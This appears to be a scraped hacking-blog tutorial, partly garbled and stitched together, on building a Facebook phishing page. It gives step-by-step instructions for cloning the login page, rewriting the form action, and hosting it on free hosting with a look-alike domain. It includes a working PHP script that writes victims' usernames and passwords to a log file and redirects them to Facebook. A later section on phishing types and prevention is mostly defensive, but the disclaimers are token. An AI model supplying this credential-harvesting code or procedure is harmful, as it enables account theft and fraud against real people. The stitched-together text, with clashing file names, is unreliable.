Phishing Code For Facebook



We are going to take Facebook phishing page as an example. Go to Facebook.com, make sure you are not logged in to Facebook. Press Ctrl U to view the source code. Copy the source code and paste it in a notepad. Find the action attribute of the login form in the code. Search for keyword “action” without quotes by pressing Ctrl F in notepad. Otp phishing Topics phishing otpbypass otp-phishing otp-verification informationgathering iplocator advancephishing latest-phishing zomato-phishing ola-phishing paytm-phishing hotstar-phishing ubereats-phishing facebook-otp amazone-tfo google-otp linkedin-otp paytm-otp whatsapp-otp tiktok-phishing.

Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.

Ever heard about Phishing page and Phishing Attack? Today I’m going to show you how to create a Phishing page & How to do Phishing Attack step by step full tutorial. So, do you know

Table Of Content

Phishing Code For Facebook
  • 1 What is Phishing Page?
    • 1.3 How to make a php script?

This Tutorial is for Education Purpose only!!!

Phishing is a technique by which we create a similar web page(Phishing Page) to the original one. In this technique, we copy original website page code and do some changes to it. Then upload it to the hosting and access it from anywhere.

Here is the list of things that you will learn from this post

  • How to copy the code from the original website
  • How to do some changes in this code
  • How to make a php script
  • How to upload it to the Hosting
  • and a lot more !!!

Umm!!! Interested to read further ?? I’m sure you will like this tutorial and you want this tutorial. 😛

DON’T MISS:- web.whatsapp.com Hack Tutorial Step by Step Explanation

How to copy the code from the original website

Open a website of which Phishing page do you want then press ctrl+U to open its source code file. For ex:- I’m copying the code of Facebook.com and then I will make a facebook phishing page. Well, this is what which you want …Right!! 😛

So I’m copying the source code from Fcaebook.com by pressing ctrl+U. You can see here the source code from Facebook.com is shown here.

The only thing you have to do is to select all code and then copy this code by pressing ctrl+A and then ctrl+C and then open a notepad file and paste it there by pressing ctrl+V.

You can see here I pasted down the whole code from website to my notepad file.

How to do some changes in this code?

Now, you have to find this line by pressing ctrl+F and type this whole line there and press Enter.

action=”https://www.facebook.com/login.php?login_attempt=1&lwv=110″ method=”post”


Let’s do some changes, You can see the path of Facebook is shown here. Copy this whole path and replace it with login.php and also change the method from post to get. and save this notepad file with the name fb.html.

Original Phishing Code For Facebook


How to make a php script?

Do you know Php Language? Well, If you don’t know anything about Php Language then no problem but in the future, I recommend you to learn this language. So, I’m giving you a PHP code which will save the username password which is entered on our fb.html page. and it also saves different username and password to a new line. When the victim enters his username and password to it then this PHP script will redirect that user to the original Facebook page.

So, here’s the Php script

<?php
header(“Location: https://www.facebook.com”);
$handle = fopen(“logs.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);


fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

Just copy this script and paste it down to your notepad file and then save this file with a name hack.php

One more thing creates a blank notepad file with a logs.txt name on which victim’s usernames and password will save.

Now, you have three notepad files one is none.html and second is login.php and third is logs.txt. Just copy all files and save it to a new folder.

How to upload Facebook Phishing Page to the Hosting?

Let Understand what is Hosting and Domain. To open a website we must have a domain, hosting. So, Domain is the name of our website. For ex :- I have Hackingblogs.com This is my domain. and the location where this domain has parked this location is known as hosting.

Still Confused!! Let’s Understand with an Example, Whenever we open a new store then we have to decide two things

  • Store’s Name
  • Land/room

Similarly, For opening a website we need Domain for a website which is unique. and the second one is the land which is hosting on the Internet. Hosting and Domain are paid and some websites also provide this hosting and domain at free of cost.

Here’s the list of Free hosting providers website.


  • and many more…

I’m using 000webhost here. So, open this website and do sign up there. In the field of a website, name leaves it blank.

and now you have to take a domain which looks similar to Facebook. If you don’t know about creating a similar word the same as the original one. Check my earlier post.

I’m sharing some website link which provides free domains.

You can use any of them to register a domain for free. Now, come to the hosting. You can use any of the websites. Now, the post is becoming so long so, at 29 April I will upload Its second part in which I will show you how to attach domain and hosting and also tell some tricks which nobody tells you. 🙂 So, do subscribe to the new post. Good Bye 🙂

This is the Second Part:- How to Upload a Phishing page on Hosting | Phishing Page Part 2

Phishing is the most commonly used method to hack Facebook. The most widely used technique in phishing is the use of Fake Log in Pages, also known as spoofed pages. In this post, you will learn about what is phishing, phishing attack, types, and techniques, how we can prevent such attacks and phishing facebook page.

You Can Also Read

What is Phishing?

It is the most common method used by hackers to hack accounts and an example of social engineering techniques that are used to deceive users. A phishing attack can be used to hack any type of accounts (almost most of the accounts can be hacked using this technique).

Phishing is a fraud and illegal activity used to obtain some bank account credentials, social account username, email address and passwords, credit card and many more fraud activities.

Hackers create a fake phishing page that looks like the original official website and due to this many people enter their information.

Hackers mainly use email messages, Instant messaging platforms like Facebook, WhatsApp, WeChat, Hike, etc. to send the links for hacking your passwords.

In a survey, It is found that phishing is one of the most common techniques used by hackers to hack accounts and the success rate of this technique is high. But nowadays people are getting aware of this techniques but we need to update ourselves from time to time from the latest hacking methods.

Suggested: Increase real Instagram followers using this tool for free

Phishing Attack

The phishing attack is one of the dangerous fraud activities that can steal your important and sensitive information such as credit cards, social accounts, website admin passwords, etc.

A phishing attack can be used for different purposes like hacking facebook account, Instagram account, credit card numbers, bank account information, and for many other purposes.

Facebook phishing scams are widely used and it is the easiest method of hacking someone’s account. These fake login pages look like the original login pages of sites like Yahoo, Gmail, MySpace, etc. The victim is fooled to believe the fake Facebook page to be the real one and enter his/her password. But once the user attempts to log in through these pages, his/her Facebook login details are stolen away.

You can make any type of phishing login page to hack facebook using phishing. It is a criminal offense and illegal activity so don’t try to anyone. You can try this on your own account or system to learn this technique but do not try it on anyone else.

Suggested: WiFi hacking complete tutorial guide – Hack nearby WiFi password using this tool

Types & Techniques of Phishing

Types and techniques that are commonly used in this type of attack.

Social engineering

In this technique, users can be encouraged to open attachment or links send to their email address or on instant messaging. When users open this link or attachment they got infected by a virus or hacked.

Clone phishing

Clone phishing is a kind of phishing attack whereby a genuine, and recently conveyed, an email containing a attachments/link has its substance and beneficiary address taken and used to make a practically indistinguishable or cloned email.

The link inside the email is supplanted with a malevolent form and after that sent from an email address parodied to seem to originate from the first sender.

It might profess to be a resend of the first or a refreshed variant to the first. This strategy could be utilized to turn from a recently tainted machine and addition and a dependable balance on another machine, by abusing the social trust related to the induced association because of the two gatherings accepting the first email.

Voice phishing

Voice phishing is a good example that not all phishing attack requires to create a fake page of a website to get users password and email ID. In this phishing attack, hackers sent a message to your phone that claims to be from the bank, in which it says that you have some problems related to the bank account and you need to dial a customer number (customer number will be given in your message) to fix the problem.

But this message does not belong to the official bank. It is a trap to get your account bank number and password. When the user dials this number (hackers number which users may think official bank number), Hackers told users to enter their account numbers and PIN.

This type of phishing attack is called voice phishing. This phishing attack is done using VOIP.

For

Suggested: 3 techniques to hide Your IP Address

Spear phishing

In this phishing attack, hackers target specific individuals by collecting personal information and data of the individuals to increase their chances of success.

Other techniques

  • Link manipulation
  • Whaling

Suggested: 10 Best educational apps for students – Learning apps to Learn new things

How to prevent Phishing attack

1. Unknown mails

Do not open unknown email messages or links.

2. Attachments

Do not click or download any unknown attachment send by someone in your mail. If you know that the file is safe then you can open it.

3. Two-Step Verification (2-Step Verification)

Always use 2 step verification for all of your accounts such as Gmail, Facebook, WhatsApp. Two-step verification protects you from hackers. Even if they successfully hacked your account they can’t log in to your account. They need to enter the digit code which will be sent on your phone.

4. Antivirus

Use good antivirus software, It can help you to protect all your sensitive information by detecting the virus, fraud links, phishing attack, ransomware attack, etc.

Antivirus also protects you when you are doing some online activities. If the antivirus found some potentially dangerous websites that can steal your information. It will automatically block such websites and files from the Internet.

5. Check the URL

Check the URL of the website before entering any information. A phishing page will look like a real one but you can easily identify them by checking the URL.

For

6. Do not share OTP

Do not share your bank OTP with anyone or do not enter any sensitive information such as bank account number and password over the voice call.

7. Game links

If your friend sends you a link and invited to play a game then before entering any information check that the link URL is real or fake one.

8. Do not login to your social media accounts using Email links

Do not log in to your account social media account using the mail message as it can be a hacking link to trick you and get your password.

Original Phishing Code For Facebook

You can find more tips to prevent yourself from hacking.

See Also:

Layouts For Facebook

phishing is a criminal offense and illegal activity so don’t try to anyone. This tutorial is for educational purpose.

Facebook Phishing Website

For any help, you can leave a message on the Facebook page.